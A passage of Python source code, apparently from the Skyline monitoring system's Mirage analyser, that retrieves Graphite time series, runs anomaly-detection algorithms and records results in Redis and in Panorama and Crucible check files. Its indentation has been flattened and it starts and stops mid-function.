high_resolution_seconds = int_second_order_resolution_seconds - 3600
high_resolution_timestamp = int_metric_timestamp - high_resolution_seconds
graphite_from = datetime.datetime.fromtimestamp(high_resolution_timestamp).strftime('%H:%M_%Y%m%d')
# Remove any old file related to the metric
metric_high_res_file = '%s/%s.high_res' % (metric_data_dir, str(metric))
try:
os.remove(metric_high_res_file)
except OSError:
pass
# Get data from graphite
logger.info(
'retrieve data :: surfacing high resolution %s time series from graphite for %s seconds' % (
metric, str(high_resolution_seconds)))
try:
high_res = True
self.surface_graphite_metric_data(metric, graphite_from, graphite_until, high_res)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to surface_graphite_metric_data to populate %s' % (
str(metric_high_res_file)))
# Check there is a json high_res timeseries file to test
if not os.path.isfile(metric_high_res_file):
logger.error(
'error :: retrieve failed - failed to surface high resolution %s time series from graphite' % (
metric))
else:
logger.info('retrieved data :: for %s at %s seconds' % (
metric, str(high_resolution_seconds)))
use_high_res_file = metric_high_res_file
####
# Make process-specific dicts
exceptions = defaultdict(int)
anomaly_breakdown = defaultdict(int)
self.check_if_parent_is_alive()
with open((metric_json_file), 'r') as f:
timeseries = json.loads(f.read())
logger.info('data points surfaced :: %s' % (str(len(timeseries))))
# @added 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
high_resolution_analysis = False
if use_high_res_file:
high_resolution_timeseries = []
try:
with open((use_high_res_file), 'r') as f:
high_resolution_timeseries = json.loads(f.read())
logger.info('high resolution data points surfaced :: %s' % (str(len(timeseries))))
except Exception as e:
logger.error('error :: could not create high_resolution_timeseries from %s - %s' % (
str(use_high_res_file), str(e)))
if high_resolution_timeseries:
low_resolution_timeseries = list(timeseries)
logger.info('overriding timeseries with high_resolution_timeseries for analysis')
timeseries = high_resolution_timeseries
second_order_low_resolution_seconds = int(second_order_resolution_seconds)
second_order_resolution_seconds = int(high_resolution_seconds)
high_resolution_analysis = True
# @added 20170212 - Feature #1886: Ionosphere learn
# Only process if the metric has sufficient data
first_timestamp = None
try:
first_timestamp = int(timeseries[0][0])
except:
logger.error('error :: could not determine first timestamp')
timestamp_now = int(time())
valid_if_before_timestamp = timestamp_now - int(settings.FULL_DURATION)
valid_mirage_timeseries = True
if first_timestamp:
if first_timestamp > valid_if_before_timestamp:
valid_mirage_timeseries = False
# @added 20170603 - Feature #2034: analyse_derivatives
# Convert the values of metrics strictly increasing monotonically
# to their deriative products
known_derivative_metric = False
try:
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# derivative_metrics = list(self.redis_conn.smembers('derivative_metrics'))
derivative_metrics = list(self.redis_conn_decoded.smembers('derivative_metrics'))
except:
derivative_metrics = []
redis_metric_name = '%s%s' % (settings.FULL_NAMESPACE, str(metric))
if redis_metric_name in derivative_metrics:
known_derivative_metric = True
if known_derivative_metric:
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
non_derivative_monotonic_metrics = list(settings.NON_DERIVATIVE_MONOTONIC_METRICS)
except:
non_derivative_monotonic_metrics = []
skip_derivative = in_list(redis_metric_name, non_derivative_monotonic_metrics)
if skip_derivative:
known_derivative_metric = False
if known_derivative_metric and valid_mirage_timeseries:
try:
derivative_timeseries = nonNegativeDerivative(timeseries)
timeseries = derivative_timeseries
except:
logger.error('error :: nonNegativeDerivative failed')
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
if snab_only_check:
snab_recheck_key = 'snab.recheck.%s' % metric
snab_recheck_key_exists = False
try:
snab_recheck_key_exists = self.redis_conn_decoded.get(snab_recheck_key)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis key %s' % (
snab_recheck_key))
original_added_at = 0
if snab_recheck_key_exists:
logger.info('snab recheck key exists - %s' % snab_recheck_key)
try:
original_added_at = int(snab_recheck_key_exists)
except:
# The key expired
original_added_at = int(time()) - 300
else:
logger.info('snab recheck key does not exists - %s' % snab_recheck_key)
snab_recheck_original_anomaly_timestamp_key = 'snab.recheck.anomaly_timestamp.%s' % metric
snab_recheck_original_anomaly_timestamp_key_exists = False
try:
snab_recheck_original_anomaly_timestamp_key_exists = self.redis_conn_decoded.get(snab_recheck_original_anomaly_timestamp_key)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis key %s' % (
snab_recheck_key))
original_anomaly_timestamp = int(timeseries[-1][0])
if snab_recheck_original_anomaly_timestamp_key_exists:
logger.info('snab.recheck.anomaly_timestamp key exists - %s' % snab_recheck_original_anomaly_timestamp_key)
try:
original_anomaly_timestamp = int(snab_recheck_original_anomaly_timestamp_key_exists)
except:
# The key expired
pass
else:
logger.info('snab.recheck.anomaly_timestamp key does not exists - %s' % snab_recheck_original_anomaly_timestamp_key)
snab_json_file_created = False
if snab_recheck_key_exists and snab_recheck_original_anomaly_timestamp_key_exists:
# Create timeseries json file with the timeseries
use_snab_timestamp = metric_timestamp
try:
use_snab_timestamp = int(timeseries[-1][0])
except:
pass
snab_json_file = '%s/%s.%s.json' % (
# settings.SNAB_DATA_DIR, str(int(metric_timestamp)), str(metric))
settings.SNAB_DATA_DIR, str(int(use_snab_timestamp)), str(metric))
timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
try:
snab_data_last_datapoint = [timeseries[-1][0], timeseries[-1][1]]
except:
snab_data_last_datapoint = [None, None, 'there was no timeseries data']
if timeseries_json:
try:
write_data_to_file(skyline_app, snab_json_file, 'w', timeseries_json)
logger.info('added snab timeseries file with last entry - %s :: %s' % (
str(snab_data_last_datapoint), snab_json_file))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add snab timeseries file :: %s' %
snab_json_file)
if not os.path.isfile(snab_json_file):
logger.error('error - the snab_json_file was not created - %s' % (
str(snab_json_file)))
else:
logger.info('snab_json_file exists - %s' % snab_json_file)
snab_json_file_created = True
else:
logger.error(
'error :: no timeseries_json to add snab timeseries file :: %s' %
snab_json_file)
else:
logger.info('not adding snab_json_file as snab recheck keys no longer not exist')
if snab_json_file_created:
data = {
'metric': metric,
'anomaly_data': snab_json_file,
'timestamp': int(timeseries[-1][0]),
'original_anomaly_timestamp': original_anomaly_timestamp,
'value': timeseries[-1][1],
'original_added_at': original_added_at,
}
try:
self.redis_conn.sadd(mirage_snab_only_checks_redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to %s Redis set' % (
metric, str(mirage_snab_only_checks_redis_set)))
# Remove metric check file
try:
os.remove(metric_check_file)
except OSError:
pass
# Remove the metric directory
try:
rmtree(metric_data_dir)
logger.info('removed data dir for snab_check_only - %s' % metric_data_dir)
except:
logger.error('error :: failed to rmtree for snab_check_only - %s' % metric_data_dir)
return
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrcs have negatives values some they can be
# added to the ionosphere.untrainable_metrics Redis set
run_negatives_present = False
if settings.IONOSPHERE_ENABLED and valid_mirage_timeseries:
run_negatives_present = True
known_negative_metric_matched_by = None
known_negative_metric, known_negative_metric_matched_by = matched_or_regexed_in_list(skyline_app, metric, KNOWN_NEGATIVE_METRICS)
if known_negative_metric:
run_negatives_present = False
logger.info('will not check %s for negative values' % (metric))
else:
logger.info('will check %s for negative values' % (metric))
# @added 20201001 - Branch #3068: SNAB
# Task #3748: POC SNAB
# Add timings
snab_check_namespace = False
if SNAB_ENABLED and SNAB_CHECKS:
for app in SNAB_CHECKS:
if app == skyline_app:
for snab_context in SNAB_CHECKS[app]:
if snab_check_namespace:
break
for algorithm in SNAB_CHECKS[app][snab_context]:
if snab_check_namespace:
break
try:
for namespace in SNAB_CHECKS[app][snab_context][algorithm]['namespaces']:
if namespace in redis_metric_name:
snab_check_namespace = True
break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check if %s is a snab_check_metric' % redis_metric_name)
# @added 20200607 - Feature #3566: custom_algorithms
algorithms_run = list(settings.MIRAGE_ALGORITHMS)
# @added 20200904 - Feature #3734: waterfall alerts
anomalous = None
# @added 20201001 - Branch #3068: SNAB
# Task #3748: POC SNAB
# Add timings
analysis_start_time = time()
try:
if valid_mirage_timeseries:
logger.info('analyzing :: %s at %s seconds' % (metric, second_order_resolution_seconds))
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added run_negatives_present and negatives_found
# anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric, second_order_resolution_seconds)
# @modified 20200607 - Feature #3566: custom_algorithms
# Added algorithms_run
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
anomalous, ensemble, datapoint, negatives_found, algorithms_run = run_selected_algorithm(timeseries, metric, second_order_resolution_seconds, run_negatives_present, triggered_algorithms)
else:
logger.info('not analyzing :: %s at %s seconds as there is not sufficiently older datapoints in the timeseries - not valid_mirage_timeseries' % (metric, second_order_resolution_seconds))
anomalous = False
datapoint = timeseries[-1][1]
# It could have been deleted by the Roomba
except TypeError:
# @added 20200430 - Feature #3480: batch_processing
# Added logging here as the DeletedByRoomba exception is
# generally not related to that but related to some other fail
# in the processing of the run algorithms phase.
# It could have been deleted by the Roomba, but Mirage does not use
# Redis data so probably, definitely was not :)
logger.error(traceback.format_exc())
logger.error('error :: added as DeletedByRoomba but possibly not see traceback above')
exceptions['DeletedByRoomba'] += 1
logger.info('exceptions :: DeletedByRoomba')
except TooShort:
exceptions['TooShort'] += 1
logger.info('exceptions :: TooShort')
except Stale:
exceptions['Stale'] += 1
logger.info('exceptions :: Stale')
except Boring:
exceptions['Boring'] += 1
logger.info('exceptions :: Boring')
except:
exceptions['Other'] += 1
logger.info('exceptions :: Other')
logger.error(traceback.format_exc())
# @added 20201001 - Branch #3068: SNAB
# Task #3748: POC SNAB
# Add timings
analysis_run_time = time() - analysis_start_time
logger.info('algorithms analysis completed in %.2f seconds' % (
analysis_run_time))
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
if metric.startswith(settings.FULL_NAMESPACE):
base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric
# @added 20210505 - Bug #4048: Mirage - removing feedback metrics to be processed
feedback_cache_key_exists = False
feedback_cache_key = 'mirage.feedback_metric.checked.%s' % (base_name)
try:
feedback_cache_key_exists = self.redis_conn_decoded.get(feedback_cache_key)
except Exception as e:
logger.error('error :: failed to get %s key from Redis - %s' % (
str(feedback_cache_key), e))
if feedback_cache_key_exists:
feedback_processed_cache_key = 'mirage.feedback_metric.processed.%s' % (base_name)
logger.info('feedback metric processed adding Redis key with 600 TTL - %s' % feedback_processed_cache_key)
try:
self.redis_conn.setex(feedback_processed_cache_key, 600, int(analysis_start_time))
except Exception as e:
logger.error('error :: failed to add %s key to Redis - %s' % (
str(feedback_processed_cache_key), e))
# @added 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
if high_resolution_analysis:
second_order_resolution_seconds = int(second_order_low_resolution_seconds)
datapoint = low_resolution_timeseries[-1][1]
timeseries = low_resolution_timeseries
logger.info('analysis on high resolution done, reverting to original timeseries and second_order_resolution_seconds')
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp. waterfall_panorama_data]
redis_set = 'analyzer.waterfall_alerts.sent_to_mirage'
literal_analyzer_waterfall_alerts = []
try:
literal_analyzer_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_analyzer_waterfall_alerts = []
analyzer_waterfall_alerts = []
for literal_waterfall_alert in literal_analyzer_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
analyzer_waterfall_alerts.append(waterfall_alert)
if not anomalous:
not_anomalous_metric = [datapoint, base_name]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.not_anomalous_metrics.append(not_anomalous_metric)
redis_set = 'mirage.not_anomalous_metrics'
data = str(not_anomalous_metric)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
redis_set = 'analyzer.waterfall_alerts.sent_to_mirage'
for waterfall_alert in analyzer_waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_set))
# @added 20201128 - Feature #3734: waterfall alerts
# If the check just done is new than an existing analyzer
# waterfall alert metric timestamp remove those keys as well
if int(waterfall_alert[1]) < metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item with older timestamp from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_set))
# @added 20210330 - Feature #3994: Panorama - mirage not anomalous
# A hash is added to the mirage.panorama.not_anomalous_metrics for
# every metric that is found to be not anomalous. This provides
# data for /panorama?not_anomalous and /panorama?not_anomalous_metric
# method which are used for plots in the webapp and json response.
# The mirage.panorama.not_anomalous_metrics Redis hash is managed in
# analyzer/metrics_manager
not_anomalous_timestamp = None
try:
not_anomalous_timestamp = int(timeseries[-1][0])
except:
not_anomalous_timestamp = int(metric_timestamp)
redis_hash = 'mirage.panorama.not_anomalous_metrics'
try:
data = {
base_name: {
'timestamp': not_anomalous_timestamp,
'value': datapoint,
'hours_to_resolve': int(hours_to_resolve),
}
}
self.redis_conn.hset(redis_hash, time(), str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis hash %s' % (
str(data), str(redis_hash)))
logger.info('not anomalous :: %s with %s' % (metric, value))
# If it's anomalous, add it to list
if anomalous:
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
if metric.startswith(settings.FULL_NAMESPACE):
base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric
# metric_timestamp = int(timeseries[-1][0])
metric_timestamp = int_metric_timestamp
# Get the anomaly breakdown - who returned True?
triggered_algorithms = []
for index, value in enumerate(ensemble):
if value:
# @modified 20200607 - Feature #3566: custom_algorithms
# algorithm = settings.MIRAGE_ALGORITHMS[index]
algorithm = algorithms_run[index]
anomaly_breakdown[algorithm] += 1
triggered_algorithms.append(algorithm)
# @modified 20201007 - Feature #3772: Add the anomaly_id to the http_alerter json
# Branch #3068: SNAB
# Added second_order_resolution_seconds, triggered_algorithms and algorithms_run
# anomalous_metric = [datapoint, base_name, metric_timestamp]
anomalous_metric = [datapoint, base_name, metric_timestamp, second_order_resolution_seconds, triggered_algorithms, algorithms_run]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.anomalous_metrics.append(anomalous_metric)
redis_set = 'mirage.anomalous_metrics'
data = str(anomalous_metric)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to mirage.anomalous_metrics Redis set' % (
str(data)))
# @modified 20201001 - Branch #3068: SNAB
# Task #3748: POC SNAB
# Added analysis_run_time
if snab_check_namespace:
redis_key = 'mirage.analysis_run_time.%s.%s' % (base_name, str(metric_timestamp))
try:
self.redis_conn.setex(redis_key, 120, str(analysis_run_time))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add snab analysis_run_time Redis key - %s' % (
redis_key))
logger.info('anomaly detected :: %s with %s' % (metric, str(datapoint)))
# It runs so fast, this allows us to process 30 anomalies/min
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# Removed limit
# sleep(2)
# @added 20170206 - Bug #1904: Handle non filesystem friendly metric names in check files
sane_metricname = filesafe_metricname(str(base_name))
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrcs have negatives values some they can be
# added to the ionosphere.untrainable_metrics Redis set
if run_negatives_present and negatives_found:
redis_set = 'ionosphere.untrainable_metrics'
try:
last_negative_timestamp = int(negatives_found[-1][0])
last_negative_value = negatives_found[-1][1]
remove_after_timestamp = int(last_negative_timestamp + second_order_resolution_seconds)
data = str([base_name, metric_timestamp, datapoint, last_negative_timestamp, last_negative_value, second_order_resolution_seconds, remove_after_timestamp])
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# If Crucible or Panorama are enabled determine details
determine_anomaly_details = False
if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
determine_anomaly_details = True
if settings.PANORAMA_ENABLED:
determine_anomaly_details = True
# If Ionosphere is enabled determine details
try:
ionosphere_enabled = settings.IONOSPHERE_ENABLED
if settings.IONOSPHERE_ENABLED:
determine_anomaly_details = True
except:
ionosphere_enabled = False
if determine_anomaly_details:
# metric_timestamp = str(int(timeseries[-1][0]))
from_timestamp = str(int(timeseries[1][0]))
timeseries_dir = base_name.replace('.', '/')
cache_key = 'mirage.last_alert.smtp.%s' % (base_name)
last_alert = False
try:
# @modified 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Changed the last_alert cache key to hold the last
# anomaly timestamp
# last_alert = self.redis_conn.get(cache_key)
last_alert = self.redis_conn_decoded.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % str(e))
# @added 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Evaluate the reported anomaly timestamp to determine whether
# EXPIRATION_TIME should be applied to a batch metric
if last_alert:
# Is this a analyzer_batch related anomaly
analyzer_batch_anomaly = None
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(int_metric_timestamp), base_name)
try:
analyzer_batch_anomaly = self.redis_conn_decoded.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
logger.info('not identified as an analyzer_batch triggered anomaly as no Redis key found - %s' % analyzer_batch_metric_anomaly_key)
if last_alert and analyzer_batch_anomaly:
# @modified 20201107 - Feature #3830: metrics_manager
# Optimise to use metrics_manager HGETALL rather than
# iterating the list of lists
# mirage_metrics_expiration_times = []
# try:
# mirage_metrics_expiration_times = list(self.redis_conn_decoded.smembers('mirage.metrics_expiration_times'))
# if LOCAL_DEBUG:
# logger.info('debug :: fetched the mirage.metrics_expiration_times Redis set')
# except:
# logger.info('failed to fetch the mirage.metrics_expiration_times Redis set')
# mirage_metrics_expiration_times = []
# metric_expiration_time = 3600
# try:
# for item_list_string in mirage_metrics_expiration_times:
# mirage_alert_expiration_data = literal_eval(item_list_string)
# if mirage_alert_expiration_data[0] == base_name:
# metric_expiration_time = int(mirage_alert_expiration_data[1])
# break
# except:
# if LOCAL_DEBUG:
# logger.error('error :: failed to determine mirage_alert_expiration_data for %s from the mirage.metrics_expiration_times Redis set' % str(base_name))
# metric_expiration_time = 3600
mirage_metrics_expiration_times = {}
try:
mirage_metrics_expiration_times = self.redis_conn_decoded.hgetall('mirage.hash_key.metrics_expiration_times')
logger.info('%s entries in mirage.hash_key.metrics_expiration_times Redis hash key' % str(len(mirage_metrics_expiration_times)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis hash key mirage.hash_key.metrics_expiration_times')
mirage_metrics_expiration_times = {}
try:
logger.info('%s entries in mirage.hash_key.metrics_expiration_times Redis hash key' % str(len(mirage_metrics_expiration_times)))
metric_expiration_time = int(mirage_metrics_expiration_times[base_name])
logger.info('%s has expiration time of %s' % (base_name, str(metric_expiration_time)))
except:
if LOCAL_DEBUG:
logger.error('error :: failed to determine mirage_alert_expiration_data for %s from the mirage.hash_key.metrics_expiration_times Redis hash key' % str(base_name))
metric_expiration_time = 3600
last_timestamp = None
try:
last_timestamp = int(last_alert)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine last_timestamp from the last Mirage alert key - %s' % cache_key)
last_timestamp = None
seconds_between_batch_anomalies = None
if last_timestamp:
try:
seconds_between_batch_anomalies = int(int_metric_timestamp) - int(last_timestamp)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine seconds_between_batch_anomalies for batch metric Panorama key- %s' % cache_key)
last_timestamp = None
if seconds_between_batch_anomalies:
if seconds_between_batch_anomalies > int(metric_expiration_time):
logger.info('the difference between the last anomaly timestamp (%s) and the batch anomaly timestamp (%s) for batch metric %s is greater than the metric EXPIRATION_TIME of %s' % (
str(last_timestamp), str(int_metric_timestamp), base_name,
str(metric_expiration_time)))
logger.info('alerting on anomaly for batch metric %s, so setting last_alert to None' % (
metric))
last_alert = None
else:
logger.info('the difference between the last anomaly timestamp (%s) and the batch anomaly timestamp (%s) for batch metric %s is less than the metric EXPIRATION_TIME of %s, not alerting' % (
str(last_timestamp), str(int_metric_timestamp), base_name,
str(metric_expiration_time)))
if int(int_metric_timestamp) < last_timestamp:
logger.info('batch anomaly timestamp (%s) less than the last_check timestamp (%s), alerting on anomaly for batch metric %s, so setting last_alert to None' % (
str(int_metric_timestamp), str(last_timestamp), base_name))
last_alert = None
# @added 20170308 - Feature #1960: ionosphere_layers
# Allow Ionosphere to send Panorama checks, it is an ionosphere_metric
try:
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
ionosphere_unique_metrics = []
added_at = str(int(time()))
# If Panorama is enabled - create a Panorama check
# @modified 20170308 - Feature #1960: ionosphere_layers
# Allow Ionosphere to send Panorama checks for ionosphere_metrics
# if settings.PANORAMA_ENABLED:
send_to_panorama = False
redis_metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(base_name))
if settings.PANORAMA_ENABLED:
send_to_panorama = True
if redis_metric_name in ionosphere_unique_metrics:
send_to_panorama = False
if send_to_panorama:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed is single quoted intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
source = 'graphite'
panaroma_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(datapoint), from_timestamp,
# @modified 20200607 - Feature #3566: custom_algorithms
# str(int_metric_timestamp), str(settings.MIRAGE_ALGORITHMS),
str(int_metric_timestamp), str(algorithms_run),
triggered_algorithms, skyline_app, source,
this_host, added_at)
# Create an anomaly file with details about the anomaly
panaroma_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at, sane_metricname)
try:
write_data_to_file(
skyline_app, panaroma_anomaly_file, 'w',
panaroma_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Move to Redis set block below
# self.sent_to_panorama.append(base_name)
except:
logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
logger.error(traceback.format_exc())
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved from the above self.sent_to_panorama
redis_set = 'mirage.sent_to_panorama'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20210323 - Feature #3642: Anomaly type classification
if LUMINOSITY_CLASSIFY_ANOMALIES:
redis_set = 'luminosity.classify_anomalies'
data_dict = {
'metric': metric,
'timestamp': int_metric_timestamp,
'value': datapoint,
'algorithms': algorithms_run,
'triggered_algorithms': triggered_algorithms,
'app': skyline_app,
'added_at': int(added_at),
}
data = [metric, int_metric_timestamp, int(added_at), data_dict]
try:
self.redis_conn.sadd(redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
redis_set = 'analyzer.waterfall_alerts.sent_to_mirage'
for waterfall_alert in analyzer_waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_set))
# If crucible is enabled - save timeseries and create a
# crucible check
if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
from_timestamp = str(int(timeseries[1][0]))
timeseries_dir = base_name.replace('.', '/')
crucible_anomaly_dir = str(settings.CRUCIBLE_DATA_FOLDER) + '/' + timeseries_dir + '/' + metric_timestamp
if not os.path.exists(crucible_anomaly_dir):
mkdir_p(crucible_anomaly_dir)
# Note:
# The value is enclosed is single quoted intentionally
# as the imp.load_source used in crucible results in a
# shift in the decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
crucible_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'anomaly_dir = \'%s\'\n' \
'graphite_metric = True\n' \
'run_crucible_tests = False\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(datapoint), from_timestamp,
# @modified 20200607 - Feature #3566: custom_algorithms
# str(int_metric_timestamp), str(settings.MIRAGE_ALGORITHMS),
str(int_metric_timestamp), str(algorithms_run),
triggered_algorithms, crucible_anomaly_dir,
skyline_app, added_at)
# Create an anomaly file with details about the anomaly
crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, sane_metricname)
try:
write_data_to_file(
skyline_app, crucible_anomaly_file, 'w',
crucible_anomaly_data)
logger.info('added crucible anomaly file :: %s' % (crucible_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.sent_to_crucible.append(base_name)
except:
logger.error('error :: failed to add crucible anomaly file :: %s' % (crucible_anomaly_file))
logger.error(traceback.format_exc())
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved from the above self.sent_to_crucible
redis_set = 'mirage.sent_to_crucible'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# Create timeseries json file with the timeseries
json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
try:
write_data_to_file(skyline_app, json_file, 'w', timeseries_json)
logger.info('added crucible timeseries file :: %s' % (json_file))
except:
logger.error('error :: failed to add crucible timeseries file :: %s' % (json_file))
logger.error(traceback.format_exc())
# Create a crucible check file
crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, sane_metricname)
try:
write_data_to_file(
skyline_app, crucible_check_file, 'w',
crucible_anomaly_data)
logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))
except:
logger.error('error :: failed to add crucible check file :: %s' % (crucible_check_file))
logger.error(traceback.format_exc())
# @added 20160922 - Branch #922: Ionosphere
# Also added the send_anomalous_metric_to skyline_functions.py
# function
if ionosphere_enabled:
if not last_alert:
# @modified 20161228 Feature #1830: Ionosphere alerts
# Added full_duration which needs to be recorded to allow Mirage metrics
# to be profiled on Redis timeseries data at FULL_DURATION
# e.g. mirage.redis.24h.json
full_duration = str(second_order_resolution_seconds)
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = 0
send_anomalous_metric_to(
